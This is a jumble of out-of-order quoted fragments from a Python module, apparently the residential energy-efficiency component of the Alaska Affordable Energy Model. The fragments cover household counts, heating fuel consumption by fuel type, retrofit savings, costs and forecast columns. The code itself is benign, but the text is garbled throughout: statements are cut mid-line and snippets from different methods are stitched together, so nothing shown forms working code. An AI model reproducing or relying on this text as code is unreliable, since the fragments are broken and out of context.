>= 6000", "Electric Heat (kWh/year) Consumption Baseline\", \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\", \"Residential:", "Baseline\": b_bio, \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\": r_bio, \"Residential: Heating Biomass", "baseline values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating cost", "---------- community_data : CommunityData CommunityData Object for a community forecast : Forecast forecast", "set_forecast_columns (self): \"\"\"Set columns in the the forecast to values calculated in this", "on the number of units that have not been retrofit as of 2010,", "energy efficiency component of the Alaska Affordable Energy Model: This module estimates the", "= np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg", "kWh consumption for a community Attributes ---------- baseline_kWh_consumption : np.array electric consumption per", "(gallons/year) Cost Post Retrofit\", \"Residential: Heating Oil (gallons/year) Cost Savings\", \"Residential: Heating Biomass", "\"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year)", "the component. The Annual Total Savings,Annual Costs, Annual Net Benefit, NPV Benefits, NPV", "\"+ str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was \"", "heating fuels. The cost to retrofit each home is also calculated. 
Parameters ----------", "amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0", "function calls is an identity amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF =", "#~ self.baseline_fuel_other_consumption if self.cd['natural gas price'] == 0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption =", "electric consumption proposed_HF_consumption : np.array proposed total electric consumption \"\"\" self.proposed_fuel_Hoil_consumption = \\", "s_elec, \"Residential: Electric Heat (kWh/year) Cost Baseline\": b_elec_cost, \"Residential: Electric Heat (kWh/year) Cost", "con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\" \" corrected to \"+ str(con_threshold)+\" kWh per", "np.nan wood_price = np.nan elec_price = np.nan LP_price = np.nan gas_price = np.nan", "fuels per year \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) self.hoil_price =", "diagnostics : diagnostics for tracking error/warning messages initial value: diag or new diagnostics", "kWh per year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was \" + str(self.avg_kWh_consumption_per_HH)", "self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural", "Consumption Savings\": s_oil, \"Residential: Heating Oil (gallons/year) Cost Baseline\": b_oil_cost, \"Residential: Heating Oil", "Benefit ($/year)\": self.get_net_benefit(), }, years) try: df = df.round().astype(int) except ValueError: pass df", "/ 100.0 percent_accounted += amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt =", "otherwise reason : string lists reason for failure if run == False Notes", "import Forecast from 
aaem.diagnostics import Diagnostics import aaem.constants as constants from config import", "HF component and has a default value self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption()", "forecast : Forecast forecast for a community diagnostics : diagnostics, optional diagnostics for", "for estimating future values initial value: forecast cd : dictionary general data for", ": np.array baseline total heating fuel consumption \"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent =", "gas_price = self.cd['natural gas price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption * HF_price + \\", "Heat (kWh/year) Cost Savings\": s_elec_cost, \"Residential: Heating Propane (gallons/year) Consumption Baseline\": b_LP, \"Residential:", "con_threshold = self.comp_specs['min kWh per household'] yr = int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total", "Heating Propane (gallons/year) Consumption Baseline\", \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\", \"Residential:", "float(self.comp_specs['data']['average kWh per house']) if not self.intertie_data is None: avg_con = self.intertie_data.get_item( 'Residential", "(1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption *", "baseline_fuel_wood_consumption : np.array baseline cordwood consumption baseline_fuel_gas_consumption : np.array baseline natural gas consumption", "directory): \"\"\"Save the component output csv in directory Parameters ---------- directory : path", "self.diagnostics = diag if self.diagnostics == None: self.diagnostics = diagnostics() self.intertie_data = community_data.intertie_data", "def calc_init_consumption (self): \"\"\"Calculate the initial consumption for each fuel type. 
Attributes ----------", "proposed heating oil consumption proposed_fuel_wood_consumption : np.array proposed cordwood consumption proposed_fuel_LP_consumption : np.array", "= np.nan elec_price = np.nan LP_price = np.nan gas_price = np.nan b_oil =", "+ self.cd['heating fuel premium']) self.hoil_price = HF_price wood_price = self.cd['cordwood price'] elec_price =", "the base and proposed fuel costs \"\"\" self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings (self):", "constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted += amnt self.init_gas = self.calc_consumption_by_fuel(amnt,", "fuel consumed for a type of fuel \"\"\" HH_consumption = HH * self.avg_kWh_consumption_per_HH", "self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost =", "Heating Biomass (cords/year) Cost Savings\", \"Residential: Electric Heat (kWh/year) Cost Baseline\", \"Residential: Electric", "\"\"\" val = self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied'] pop = self.forecast.base_pop self.init_HH =", "self.cd[\"electric prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh #~", "Oil (gallons/year) Consumption Post Retrofit\": r_oil, \"Residential: Heating Oil (gallons/year) Consumption Savings\": s_oil,", "calls is an identity amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF = avg_EUI_reduction", "= np.float64(rd[\"LP\"]) / 100.0 self.savings_LP = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total,", "Baseline\", \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\", \"Residential: Heating Oil (gallons/year) Cost", "Savings\": s_bio_cost, \"Residential: Electric Heat (kWh/year) Consumption Baseline\": b_elec, \"Residential: Electric Heat (kWh/year)", "savings are based 
on the number of units that have not been retrofit", "Fuel All (MMBtu/year) Consumption Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\",", "proposed heating fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption : np.array proposed heating oil consumption", "All (MMBtu/year) Consumption Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\", \"Residential:", "b_oil - r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price", "Benefits, NPV Costs, NPV Net Benefits, Benefit-Cost Ratio, Levelized Cost of Energy, and", "int(round(HH*(val / self.base_pop))) def run (self, scalers = {'capital costs':1.0}): \"\"\"Runs the component.", "(Mcf/year) Cost Post Retrofit\": r_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\": s_NG_cost,", "+ \\ self.baseline_fuel_LP_consumption * LP_price + \\ self.baseline_fuel_kWh_consumption * gas_price # coal,solar, other", "reason for failure if run == False Notes ----- Accepted scalers: capital costs.", "\"\"\"calculate consumption by fuel from the total consumption Parameters ---------- fuel_amnt: float %", "np.array electric consumption per yer \"\"\" HH = self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH *", "self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\",", "return if self.cd[\"model financial\"]: HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price =", "run. Parameters ---------- scalers : dictionary of valid scalers, optional Scalers to adjust", "calculated. 
There must be a known Heat Recovery project for this component to", "= np.nan wood_price = np.nan elec_price = np.nan LP_price = np.nan gas_price =", "from. con_threshold = self.comp_specs['min kWh per household'] yr = int(self.comp_specs['data']['Year']) #~ houses =", "= self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil - r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption", "variables. See note on accepted scalers Attributes ---------- run : bool True in", "---------- proposed_HF_cost : np.array proposed heating fuel cost \"\"\" HF_price = (self.diesel_prices +", "gas_price + \\ self.proposed_fuel_LP_consumption * LP_price + \\ self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost", "\"Residential: Heating Oil (gallons/year) Cost Savings\": s_oil_cost, \"Residential: Heating Biomass (cords/year) Consumption Baseline\":", "All (MMBtu/year) Consumption Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Cost", "Fuel All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Post", "\\ self.baseline_fuel_LP_consumption * LP_price + \\ self.baseline_fuel_kWh_consumption * gas_price # coal,solar, other def", "Heating Oil (gallons/year) Cost Savings\": s_oil_cost, \"Residential: Heating Biomass (cords/year) Consumption Baseline\": b_bio,", "Cost of Energy, and Internal Rate of Return will all be calculated. 
There", "\\ \" of residential fuel sources accounted for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self):", "= self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP - r_LP b_LP_cost = self.baseline_fuel_LP_consumption", "= total HH = self.init_HH percent_accounted = 0 amnt = np.float64(rd[\"Fuel Oil\"]) /", "Heating Oil (gallons/year) Cost Baseline\": b_oil_cost, \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\":", "(gallons/year) Cost Post Retrofit\": r_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Savings\": s_LP_cost, \"Residential:", "\"\"\"Calculate post retrofit electricity costs Attributes ---------- proposed_kWh_cost: np.array proposed electricity cost \"\"\"", "will all be calculated. There must be a known Heat Recovery project for", "financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital", "per household'] yr = int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total Occupied']) #~ r_con =", "self.baseline_fuel_Hoil_consumption * HF_price + \\ self.baseline_fuel_wood_consumption * wood_price + \\ self.baseline_fuel_gas_consumption * gas_price", "directory Parameters ---------- directory : path output directory \"\"\" if not self.was_run: return", "Cost Baseline\", \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\", \"Residential: Heating Propane (gallons/year)", "optional prerequisite component data this component has no prerequisites leave empty Attributes ----------", "EUI Reduction\"]) total = area * EUI # the one in each of", "Fuel All (MMBtu/year) Cost Post 
Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost", "Heating Propane (gallons/year) Consumption Post Retrofit\": r_LP, \"Residential: Heating Propane (gallons/year) Consumption Savings\":", "been retrofit as of 2010, the performance improvements as a percentage of the", "\"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years,", "Avg Area (SF)\"] * \\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption", "Savings\", \"Residential: Heating Oil (gallons/year) Cost Baseline\", \"Residential: Heating Oil (gallons/year) Cost Post", "prerequisites : dictionary of components, optional prerequisite component data \"\"\" self.diagnostics = diag", "calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed kWh consumption for a community Attributes ---------- proposed_kWh_consumption", "self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 percent_accounted +=", "kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed heating fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption", "note on accepted scalers Attributes ---------- run : bool True in the component", "Fuel All (MMBtu/year) Cost Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\",", "Scalers to adjust normal run variables. See note on accepted scalers Attributes ----------", "number of units that have not been retrofit as of 2010, the performance", "cd : dictionary general data for a community. 
Initial value: 'community' section of", "os from aaem.components.annual_savings import AnnualSavings from aaem.community_data import CommunityData from aaem.forecast import Forecast", "on accepted scalers Attributes ---------- run : bool True in the component runs", "\"\"\" HH_consumption = HH * self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption", "gas_price # coal,solar, other def calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity costs Attributes ----------", "r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio - r_bio b_bio_cost", "= avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"])", "Cost Savings\", \"Residential: Heating Propane (gallons/year) Cost Baseline\", \"Residential: Heating Propane (gallons/year) Cost", "= int(round(HH*(val / self.base_pop))) def run (self, scalers = {'capital costs':1.0}): \"\"\"Runs the", "(gallons/year) Cost Savings\": s_oil_cost, \"Residential: Heating Biomass (cords/year) Consumption Baseline\": b_bio, \"Residential: Heating", "Benefit-Cost Ratio, Levelized Cost of Energy, and Internal Rate of Return will all", "for tracking error/warning messages initial value: diag or new diagnostics object forecast :", "retrofit each home is also calculated. 
Parameters ---------- community_data : CommunityData CommunityData Object", "component runs to completion, False otherwise reason : string lists reason for failure", "self.cd['natural gas price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption * HF_price + \\ self.proposed_fuel_wood_consumption *", "self.end_year).astype(int) df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name'] + '_' +\\", "NPV Benefits, NPV Costs, NPV Net Benefits, Benefit-Cost Ratio, Levelized Cost of Energy,", "self.init_coal #~ self.init_solar #~ self.init_other msg = str(round(percent_accounted)) + \\ \" of residential", "percent_accounted = 0 amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted += amnt self.init_HF", "fuel cost \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood", "self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 percent_accounted += amnt self.init_LP", "Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year) Consumption Baseline\": b_oil, \"Residential: Heating Oil (gallons/year)", "Savings\", \"Residential: Heating Propane (gallons/year) Consumption Baseline\", \"Residential: Heating Propane (gallons/year) Consumption Post", "self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house =", "self.cd['natural gas price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption * HF_price + \\ self.baseline_fuel_wood_consumption *", "(kWh/year) Cost Post Retrofit\", \"Residential: Electric Heat (kWh/year) Cost Savings\", \"Residential: Heating Propane", "if self.diagnostics == None: self.diagnostics = diagnostics() self.intertie_data = community_data.intertie_data self.cd = 
community_data.get_section('community')", "\" + str(yr)) def calc_init_HH (self): \"\"\"Estimate the # of households for the", "r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio - r_bio b_bio_cost = self.baseline_fuel_wood_consumption * wood_price", "wood_price s_bio_cost = b_bio_cost - r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec", "int(self.comp_specs['data']['Total Occupied']) #~ r_con = self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh per house']) if", "if len(tag) > 1 and tag[1] != 'residential': self.was_run = False self.reason =", "kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption", "($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\": self.get_net_benefit(), }, years) try: df = df.round().astype(int)", "b_LP - r_LP b_LP_cost = self.baseline_fuel_LP_consumption * LP_price r_LP_cost = self.proposed_fuel_LP_consumption * LP_price", "self.proposed_fuel_gas_consumption = 0 # coal,solar, other def calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed kWh", "self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\",", "kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0]", "self.diagnostics == None: self.diagnostics = diagnostics() self.intertie_data = community_data.intertie_data 
self.cd = community_data.get_section('community') #~", "data module, see information on CommunityData Object aaem.forecast : forecast module, see information", "(self): \"\"\"Calculate savings opportunities Attributes ---------- opportunity_HH : int Houses that can be", "\"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"] / 100.0 HH = self.households", "self.cd['heating fuel premium']) self.hoil_price = HF_price wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year:", "(MMBtu/year) Cost Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\", \"Residential: Total", "constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 self.savings_LP = avg_EUI_reduction * self.opportunity_HH * \\", "ave_con/12 if (avg_con < con_threshold) or np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential", "estimated households for first year of project \"\"\" val = self.forecast.get_population(self.start_year) HH =", "\" + str(self.avg_kWh_consumption_per_HH) +\\ \" in \" + str(yr)) def calc_init_HH (self): \"\"\"Estimate", "total heating fuel consumption \"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"] /", "value: 'community' section of community_data comp_specs : dictionary component specific data for a", "fuel sources accounted for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self): \"\"\"Calculate savings opportunities Attributes", "= 0 self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\", "== None: self.diagnostics = diagnostics() self.intertie_data = community_data.intertie_data self.cd = community_data.get_section('community') #~ self.copied_elec", "coal,solar, other def calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity costs Attributes 
---------- baseline_kWh_cost :", "Cost Savings\": s_NG_cost, \"Residential: Total Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\":", "the 6000.0 # comes from. con_threshold = self.comp_specs['min kWh per household'] yr =", "The Annual Total Savings,Annual Costs, Annual Net Benefit, NPV Benefits, NPV Costs, NPV", "in the the forecast to values calculated in this component \"\"\" years =", "string lists reason for failure if run == False Notes ----- Accepted scalers:", "Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH = np.float64( self.opportunity_HH ) #~ print self.opportunity_HH if self.opportunity_HH", "setting to 0\" ) ## % as decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~", "elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price']", "-rd[\"Post-Retrofit Number\"] self.opportunity_HH = np.float64( self.opportunity_HH ) #~ print self.opportunity_HH if self.opportunity_HH <", "None: avg_con = self.intertie_data.get_item( 'Residential Energy Efficiency', 'data' )['average kWh per house'] #~", "Consumption Savings\": s_LP, \"Residential: Heating Propane (gallons/year) Cost Baseline\": b_LP_cost, \"Residential: Heating Propane", "savings_HF : float savings in heating oil consumption savings_wood : float savings in", "[gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption)", "CommunityData CommunityData Object for a community forecast : Forecast forecast for a community", "Retrofit\": r_elec, \"Residential: Electric Heat (kWh/year) Consumption Savings\": 
s_elec, \"Residential: Electric Heat (kWh/year)", "Consumption Baseline\", \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\", \"Residential: Electric Heat (kWh/year)", "Oil (gallons/year) Cost Baseline\", \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\", \"Residential: Heating", "self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural gas price']", "str(yr)) def calc_init_HH (self): \"\"\"Estimate the # of households for the first year", "(Mcf/year) Cost Savings\": s_NG_cost, \"Residential: Total Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit", "* HH def calc_baseline_fuel_cost (self): \"\"\"calculate base line heating fuel costs Attributes ----------", "scalers = {'capital costs':1.0}): \"\"\"Runs the component. The Annual Total Savings,Annual Costs, Annual", "year of project \"\"\" val = self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied'] pop =", "Savings\": s_bio, \"Residential: Heating Biomass (cords/year) Cost Baseline\": b_bio_cost, \"Residential: Heating Biomass (cords/year)", "Avg EUI (MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption = total HH = self.init_HH percent_accounted", "Heating Natural Gas (Mcf/year) Consumption Baseline\": b_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption", "\"Residential: Heating Propane (gallons/year) Consumption Baseline\": b_LP, \"Residential: Heating Propane (gallons/year) Consumption Post", "{}): \"\"\"Class initialiser Parameters ---------- community_data : CommunityData CommunityData Object for a community", "Baseline\", \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\", \"Residential: Heating Biomass (cords/year) Consumption", "np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ 
self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler *", "Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\", \"Residential: Heating Fuel All (MMBtu/year)", "columns in the the forecast to values calculated in this component \"\"\" years", "self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh = avg_EUI_reduction *", "consumption init_gas : float initial natural gas fuel consumption init_LP : float initial", "self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit was negative, setting to 0\"", "def set_forecast_columns (self): \"\"\"Set columns in the the forecast to values calculated in", "Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. EUI", "self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount", "avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) /", "self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] else:", "self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost()", "Baseline\", \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\", \"Residential: Heating Biomass 
(cords/year) Cost", "opportunity_HH : int Houses that can be retrofit savings_HF : float savings in", "---------- init_HF : float initial heating oil consumption init_wood : float initial heating", "years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\", "savings in mmbtu \"\"\" rd = self.comp_specs['data'] ## #HH self.opportunity_HH = self.init_HH -rd[\"BEES", "b_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\": r_elec_cost, \"Residential: Electric Heat (kWh/year)", "100.0 self.savings_LP = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt", "to retrofit each home is also calculated. Parameters ---------- community_data : CommunityData CommunityData", "of households for the first year of the project Attributes ---------- init_HH :", "val = self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied'] pop = self.forecast.base_pop self.init_HH = int(round(HH*(val", "(Mcf/year) Cost Savings\", \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\", \"Residential: Heating Fuel", "Internal Rate of Return will all be calculated. 
There must be a known", "heating fuel cost \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price =", "cf): \"\"\"calculate consumption by fuel from the total consumption Parameters ---------- fuel_amnt: float", "Alaska Affordable Energy Model: This module estimates the potential improvements to heating efficiency", "Post Retrofit\": r_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Savings\": s_LP_cost, \"Residential: Heating Natural", "the forecasted price of offset heating fuels. The cost to retrofit each home", "negative, setting to 0\" ) ## % as decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"]", "= (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.cd[\"electric", "accepted scalers Attributes ---------- run : bool True in the component runs to", "# the one in each of these function calls is an identity amnt", "Cost Savings\": s_elec_cost, \"Residential: Heating Propane (gallons/year) Consumption Baseline\": b_LP, \"Residential: Heating Propane", "self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler *", "self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year) Consumption Baseline\": b_oil, \"Residential: Heating Oil (gallons/year) Consumption", "avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) /", "self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) 
